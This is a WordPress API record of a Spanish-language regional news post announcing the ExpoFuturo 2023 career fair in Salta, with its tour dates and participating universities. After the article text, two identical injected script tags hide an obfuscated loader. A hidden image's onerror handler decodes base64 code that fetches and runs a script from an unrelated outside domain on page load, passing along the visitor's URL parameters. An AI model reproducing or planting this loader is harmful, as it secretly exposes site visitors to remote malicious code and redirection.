{"id":3034,"date":"2023-08-29T11:15:03","date_gmt":"2023-08-29T14:15:03","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3034"},"modified":"2025-08-14T00:09:35","modified_gmt":"2025-08-14T03:09:35","slug":"salta-inicia-la-expofuturo-para-el-interior-y-capital-desde-este-jueves","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3034","title":{"rendered":"Salta inicia la ExpoFuturo para el interior y Capital desde este jueves"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#840b2a\"><em>Comenzar\u00e1 en Cachi y se extender\u00e1 a 8 localidades del interior, adem\u00e1s de Capital; terminar\u00e1 en General G\u00fcemes el 22 de septiembre.<\/em><\/h3>\n\n\n\n<p>El Ministerio de Educaci\u00f3n, Ciencia y Tecnolog\u00eda pondr\u00e1 en marcha la ExpoFuturo 2023 que comienza el jueves 31 de agosto y se extender\u00e1 hasta el 22 de septiembre, durante esos d\u00edas recorrer\u00e1 8 localidades del interior y Capital, adem\u00e1s ser\u00e1 transmitida por streaming y se realizar\u00e1n jornada en los colegios para llegar a todos los alumnos del \u00faltimo a\u00f1o del secundario, tanto secundarios comunes, como t\u00e9cnicos y BSPAS.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright size-full is-resized\"><img fetchpriority=\"high\" decoding=\"async\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/08\/91514-este-jueves-salta-pone-en-marcha-la-expofuturo.jpg\" alt=\"\" class=\"wp-image-3035\" width=\"334\" height=\"221\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/08\/91514-este-jueves-salta-pone-en-marcha-la-expofuturo.jpg 560w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/08\/91514-este-jueves-salta-pone-en-marcha-la-expofuturo-300x198.jpg 300w\" sizes=\"(max-width: 334px) 100vw, 334px\" \/><\/figure><\/div>\n\n\n<p>El objetivo de este gran encuentro es dar a conocer las propuestas de formaci\u00f3n del Nivel Superior, promocionar e informar sobre las distintas carreras formativas que brindan las instituciones.<\/p>\n\n\n\n<p>La Expo Futuro se replicar\u00e1 en el interior de manera presencial: el 31 de agosto en Cachi en el Sal\u00f3n Municipal; 1 de septiembre en San Antonio de los Cobres en el Complejo Municipal; el 4 de septiembre en Joaqu\u00edn V. Gonz\u00e1lez en el Complejo Municipal; el 5 de septiembre en Tartagal en el Complejo Municipal; el 6 de septiembre en Or\u00e1n en la Casa del Bicentenario; el 7 de septiembre en Rosario de la Frontera en el Complejo Municipal; el 8 de septiembre en Met\u00e1n con lugar a confirmar; del 18 al 20 de septiembre en Capital en COPROTAB y el cierre ser\u00e1 en General G\u00fcemes el 22 de septiembre en el Centro Cultural \u00ab13 de Febrero\u00bb.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/8620-este-jueves-salta-pone-en-marcha-la-expofuturo.png\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/8620-este-jueves-salta-pone-en-marcha-la-expofuturo.png\" alt=\"Este jueves Salta pone en marcha la ExpoFuturo\" width=\"411\" height=\"284\"\/><\/a><\/figure><\/div>\n\n\n<p>En esta oportunidad, se contar\u00e1 con stands de la Universidad Nacional de Salta, Universidad Cat\u00f3lica de Salta, UPATECO, Universidades Nacionales de provincias cercanas, ofertas de formaci\u00f3n a distancia, ofertas de oficios, Institutos de Educaci\u00f3n Superior e Institutos de Formaci\u00f3n Docente. Adem\u00e1s, se brindar\u00e1n talleres sobre la vida universitaria, fortalecimiento emocional, entre otros temas.<\/p>\n\n\n\n<p>\u201cConsideramos que esta propuesta educativa representa una vivencia importante en la vida de los j\u00f3venes, quienes empezar\u00e1n a transitar la toma de decisi\u00f3n al elegir una de las distintas propuestas formativas para su futuro trayecto acad\u00e9mico. De esta manera \u201cExpo Futuro 2023\u201d, busca acompa\u00f1arlos y brindarles una experiencia que aporte de manera significativa en esa instancia\u201d, sostuvo la secretaria de Planeamiento Educativo,<strong>&nbsp;Anal\u00eda Guardo<\/strong>.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/salta-inicia-la-expofuturo-para-el-interior-y-capital-desde-este-jueves-91514\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Comenzar\u00e1 en Cachi y se extender\u00e1 a 8 localidades del interior, adem\u00e1s de Capital; terminar\u00e1 en General G\u00fcemes el 22 de septiembre. El Ministerio de Educaci\u00f3n, Ciencia y Tecnolog\u00eda pondr\u00e1 en marcha la ExpoFuturo 2023 que comienza el jueves 31 de agosto y se extender\u00e1 hasta el 22 de septiembre, durante esos d\u00edas recorrer\u00e1 8 [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3036,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,15],"tags":[],"class_list":{"0":"post-3034","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-provincial"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3034"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3034"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3034\/revisions"}],"predecessor-version":[{"id":6980,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3034\/revisions\/6980"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3036"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3034"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3034"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3034"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}